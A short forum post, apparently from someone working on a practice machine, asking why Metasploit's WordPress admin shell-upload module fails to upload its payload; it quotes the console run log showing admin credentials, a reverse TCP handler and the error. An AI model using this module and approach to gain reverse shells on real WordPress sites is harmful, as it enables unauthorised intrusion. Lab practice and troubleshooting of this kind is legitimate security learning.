Hi guys! In the past few days, I’ve been doing a machine with wordpress installed on it and i’ve managed to get valid admin creds. I then tried to use the admin_shell_upload module from metasploit, to get a reverse shell but wasn’t able to, instead it always returns with the same error:
msf exploit(unix/webapp/wp_admin_shell_upload) > run [*] Started reverse TCP handler on x.x.x.x:4444 [*] Authenticating with WordPress using admin:admin123$.. [+] Authenticated with WordPress [*] Preparing payload... [*] Uploading payload... [-] Exploit aborted due to failure: unexpected-reply: Failed to upload the payload [*] Exploit completed, but no session was created. msf exploit(unix/webapp/wp_admin_shell_upload) >
i’ve read a lot of articles about this issue , tried a lot of different solutions but none actually worked. Would be absolutely great if you someone knew how to fix this issue. Thanks a lot guys!